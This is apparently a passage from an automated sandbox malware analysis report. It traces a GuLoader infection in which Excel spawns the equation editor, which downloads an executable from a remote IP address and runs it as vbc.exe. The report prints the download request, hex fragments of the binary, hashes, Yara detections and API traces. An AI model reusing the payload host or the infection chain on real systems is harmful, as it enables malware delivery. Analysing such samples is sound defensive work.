                    Jun 10, 2021 15:17:33.896256924 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896256924 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896262884 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896284103 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896294117 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896306992 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896317959 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896332979 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896334887 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896358013 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896367073 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896385908 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896389961 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896411896 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896420002 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896435976 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896446943 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896460056 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896470070 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896495104 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.899744987 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.143739939 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143801928 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143820047 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143837929 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143862963 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143887043 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143909931 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143932104 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143954039 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143975019 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.143982887 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144001007 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144020081 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144023895 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144026041 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144027948 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144030094 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144048929 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144068956 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144071102 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144081116 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144094944 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144104958 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144117117 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144133091 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144140959 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144153118 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144176960 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144179106 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144200087 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144212008 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144222975 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144226074 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144247055 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144256115 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144270897 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144282103 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144293070 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144298077 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144316912 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144329071 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144342899 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144354105 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144368887 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.144381046 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.144406080 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149018049 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149060965 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149076939 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149092913 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149113894 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149137974 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149158001 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149179935 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149203062 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149224043 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149225950 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149245024 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149256945 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149265051 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149267912 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149290085 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149308920 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149312973 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149337053 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149347067 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149358988 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149379969 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149388075 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149400949 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149421930 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149425030 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149442911 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149454117 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149463892 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149485111 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149487019 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.149511099 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.149544954 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.170694113 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.393587112 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.393635988 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.393656969 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.393676996 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.393697023 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.393717051 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:34.393834114 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:34.394695997 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:35.009526968 CEST4916780192.168.2.22103.155.82.236

                    HTTP Request Dependency Graph

                    • 103.155.82.236

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167103.155.82.23680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampkBytes transferredDirectionData
                    Jun 10, 2021 15:17:32.895608902 CEST0OUTGET /fksdoc/svchost.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 103.155.82.236
                    Connection: Keep-Alive
                    Jun 10, 2021 15:17:33.146260023 CEST1INHTTP/1.1 200 OK
                    Date: Thu, 10 Jun 2021 13:17:37 GMT
                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                    Last-Modified: Wed, 09 Jun 2021 07:07:06 GMT
                    ETag: "24000-5c44fec1ebc1c"
                    Accept-Ranges: bytes
                    Content-Length: 147456
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 b2 bb 47 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 10 1c 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 30 8e 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0f 02 00 28 00 00 00 00 40 02 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 05 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELG0 @P0$(@P( .text `.dataP @.rsrcP@0@@IMSVBVM60.DLL
                    Jun 10, 2021 15:17:33.146306038 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    Jun 10, 2021 15:17:33.146328926 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    Jun 10, 2021 15:17:33.146351099 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    Jun 10, 2021 15:17:33.395716906 CEST7INData Raw: 41 00 e8 7b 41 00 36 7c 41 00 84 7c 41 00 d2 7c 41 00 20 7d 41 00 6e 7d 41 00 bc 7d 41 00 0a 7e 41 00 58 7e 41 00 a6 7e 41 00 f4 7e 41 00 42 7f 41 00 90 7f 41 00 de 7f 41 00 2c 80 41 00 7a 80 41 00 c8 80 41 00 16 81 41 00 64 81 41 00 b2 81 41 00
                    Data Ascii: A{A6|A|A|A }An}A}A~AX~A~A~ABAAA,AzAAAdAAANAAA8AAA"ApAAAZAAADAAA.A|AAAfAAAPAAA:AAA$ArAAA\AAAFAAA0
                    Jun 10, 2021 15:17:33.395765066 CEST8INData Raw: 05 00 08 00 0c 05 42 00 00 00 00 00 13 05 42 00 06 00 04 00 00 00 00 00 09 07 42 00 ed 06 42 00 07 00 08 00 8f 09 42 00 bd 09 42 00 97 09 42 00 06 00 04 00 00 00 00 00 67 0d 42 00 3d 0d 42 00 25 00 14 00 dc 0e 42 00 00 00 00 00 e4 0e 42 00 00 00
                    Data Ascii: BBBBBBBgB=B%BB0@BBBBBBBBB%@%@%@%@%d@%@@%$@%X@%@%T@%D@%@%@%@%4@
                    Jun 10, 2021 15:17:33.395785093 CEST10INData Raw: 03 1b 00 00 00 08 05 00 4c 69 73 74 31 00 08 04 43 03 7b 05 e4 00 85 02 11 05 00 ff 03 28 00 00 00 09 06 00 43 6f 6d 62 6f 31 00 07 05 88 02 03 04 12 06 1c 01 0c 08 00 4f 6c 65 61 6e 64 65 72 00 13 04 00 ff 03 2a 00 00 00 0a 06 00 43 68 65 63 6b
                    Data Ascii: List1C{(Combo1Oleander*Check1UNGUESSING*Option1Gnomerne4E(Command1Overenf)Frame1Forvnnes7,
                    Jun 10, 2021 15:17:33.395802975 CEST11INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    Jun 10, 2021 15:17:33.395828962 CEST12INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 54 32 40 00 00 00 00 00 74 2f 41 00 ff ff ff ff 00 00 00 00
                    Data Ascii: T2@t/A2@ B<)@ 28)@3@l)@t)@p)@t)@hl+@+B`/5@ows\system32\WindowsPowe3@3@@4
                    Jun 10, 2021 15:17:33.395852089 CEST14INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 2a 40 00 c0 28 40 00 f8 1b 40 00 fe 1b 40 00 04 1c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: <*@(@@@@d*@(@@@@*@(@@@@
                    Jun 10, 2021 15:17:33.395875931 CEST15INData Raw: 2e 00 ff ff 00 00 83 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 3a 40 00 54 3a 40 00 00 00 00 00
                    Data Ascii: .D:@T:@d:@t:@|:@:@:@:@:@BronkoskoperingernesskomagerisYamphb&CYd(CFO9o&CZ_w27\X1@iAU*O3


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:15:16:46
                    Start date:10/06/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f760000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:15:17:07
                    Start date:10/06/2021
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:15:17:11
                    Start date:10/06/2021
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\vbc.exe'
                    Imagebase:0x400000
                    File size:147456 bytes
                    MD5 hash:99BBF83ABE9D6E4ECC91493E32230833
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Visual Basic
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                    Antivirus matches:
                    • Detection: 31%, Metadefender, Browse
                    • Detection: 59%, ReversingLabs
                    Reputation:low

                    Disassembly

                    Code Analysis

                    Reset < >

                      Executed Functions

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,00011000,66628F99,-2E424193), ref: 004058BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: @$C$_$h$q
                      • API String ID: 4275171209-2839808294
                      • Opcode ID: 19fe624886c6294c4c58a26b7dafc2999a74420af71b7e185235912bd1e8c7be
                      • Instruction ID: a3173b0ce8ff531f604c310f99f4cbebd2c40a7e7461c0cd1247eb664b9aa9e4
                      • Opcode Fuzzy Hash: 19fe624886c6294c4c58a26b7dafc2999a74420af71b7e185235912bd1e8c7be
                      • Instruction Fuzzy Hash: 8351D4606663424AFFB81434C6E173E1596DB56304F70EE3BCA53EAECAC92EC5C15613
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: #100
                      • String ID: VB5!6&*
                      • API String ID: 1341478452-3593831657
                      • Opcode ID: 11329e3dcc9c63cd2251095cd26cf4cf7e3b32087ece2b2a0dc12fe29e45f2d2
                      • Instruction ID: bc2b0363ddcc9f0738999dd3536d0f3544ba8b5e55dfad2faa39adb5ed85be73
                      • Opcode Fuzzy Hash: 11329e3dcc9c63cd2251095cd26cf4cf7e3b32087ece2b2a0dc12fe29e45f2d2
                      • Instruction Fuzzy Hash: 2EE1676144E7C28FD7079B708DA15A17FB0AE1331431E46EBC4C1DE1B3E22C6A5AD76A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(280BB30F,0000013C), ref: 00446C76
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID: c8W
                      • API String ID: 2167126740-2350576336
                      • Opcode ID: 08b0511700217d172f8524e6a31c03d651040b6ee3d50a26974c3e368761ad59
                      • Instruction ID: e9a0e7624d5c62589e7b5db8de1bf6ad3179e2d7f0b8d63efa48277f9f953310
                      • Opcode Fuzzy Hash: 08b0511700217d172f8524e6a31c03d651040b6ee3d50a26974c3e368761ad59
                      • Instruction Fuzzy Hash: D14124715043859FEB64DF24DC51BEE7BB2AF86310F55852EDC8A9B220D3388A41CB06
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(280BB30F,0000013C), ref: 00446C76
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID: c8W
                      • API String ID: 2167126740-2350576336
                      • Opcode ID: e2d8ce444e0a82bd0f0001ae1f826050d0c2fc27cd1432129250eaa3c52e142f
                      • Instruction ID: d6dd2b62136559af9b5630477ac19d3527517b0d27622414beaa36cd7a6a3888
                      • Opcode Fuzzy Hash: e2d8ce444e0a82bd0f0001ae1f826050d0c2fc27cd1432129250eaa3c52e142f
                      • Instruction Fuzzy Hash: FC4123706043859FEB24DF68DC51BEE7BF2AF89314F45452EDC8A9B220D3388A41CB06
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(280BB30F,0000013C), ref: 00446C76
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: 98598c18812f95cf476d4415301629cda8ba8cb7a2760976b3ad1630b9182190
                      • Instruction ID: 04ad53a9852b04739b5c4fad9541b307b0207e2a8c1a8923cd4a129651a75350
                      • Opcode Fuzzy Hash: 98598c18812f95cf476d4415301629cda8ba8cb7a2760976b3ad1630b9182190
                      • Instruction Fuzzy Hash: 8341FF706043859FEB60DF28DC51BEE7BF2AF59314F45452EDC899B260D3388A81CB0A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(280BB30F,0000013C), ref: 00446C76
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: c9ad9ac8078c91af546ade16f134f5c27aa2e25339ac38ea018dc7d534ab9ce5
                      • Instruction ID: 14b29ffaf6516c531fafe55aabd2ee8724e6edeec8cf73baf58cbb16270e249e
                      • Opcode Fuzzy Hash: c9ad9ac8078c91af546ade16f134f5c27aa2e25339ac38ea018dc7d534ab9ce5
                      • Instruction Fuzzy Hash: 1A3190716047849FDB708F64DD55BDEBBF1AF4A314F05052EDD499B260C7389A44CB0A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(280BB30F,0000013C), ref: 00446C76
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: 5156325a313f4d6f149bd6f4c7a95b710afaf04223730bf6abc23e83068f246b
                      • Instruction ID: e2feb5eaa87b1fed2b1bbb1645c79a9e32e3490d8eeeac6cdfe58968dd0d85be
                      • Opcode Fuzzy Hash: 5156325a313f4d6f149bd6f4c7a95b710afaf04223730bf6abc23e83068f246b
                      • Instruction Fuzzy Hash: 9F219DB5905389DFDB708F68ED50BEE77B1AF1A324F45052EDC099B260C7389A44CB06
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaChkstk.MSVBVM60(?,00401976), ref: 0041322E
                      • __vbaAryConstruct2.MSVBVM60(?,00403CF0,00000011,?,?,?,?,00401976), ref: 0041327A
                      • __vbaAryConstruct2.MSVBVM60(?,00403D0C,00000002,?,?,?,?,00401976), ref: 0041328E
                      • __vbaVarDup.MSVBVM60 ref: 004132BB
                      • #591.MSVBVM60(?), ref: 004132C8
                      • __vbaStrMove.MSVBVM60 ref: 004132D6
                      • __vbaStrCat.MSVBVM60(00403AEC,Strin,00000000), ref: 004132E7
                      • __vbaStrMove.MSVBVM60 ref: 004132F5
                      • __vbaStrCmp.MSVBVM60(00000000), ref: 004132FC
                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00413321
